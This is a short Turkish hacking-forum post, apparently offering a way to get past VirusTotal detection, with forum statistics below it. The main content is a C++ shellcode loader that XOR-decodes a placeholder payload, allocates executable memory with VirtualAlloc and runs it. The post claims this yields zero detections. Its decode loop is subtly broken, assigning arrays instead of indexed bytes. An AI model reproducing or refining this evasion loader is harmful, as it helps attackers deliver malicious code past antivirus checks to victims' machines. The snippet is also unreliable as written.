💥 Virüs Total Bypass Etmek 💥

Aşağıdaki kodu programın içine yazdığınızda, VirüsTotal-da 0 virüslü olarak gözükmektedir. *** Hidden text: You do not have sufficient rights to view the hidden text. Visit...

#include <windows.h>
#include <iostream>
int main(int argc, char **argv) {
char b[] = {/* your XORd with key of 'x' shellcode goes here i.e. 0x4C,0x4F, 0x4C */};
char c[sizeof b];
for (int i = 0; i < sizeof b; i++) {c = b ^ 'x';}
void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, c, sizeof c);
((void(*)())exec)();
Eyw jdhxjs
 
131,899Konular
3,272,389Mesajlar
316,496Kullanıcılar
Hüseyin.06Son Üye
Üst Alt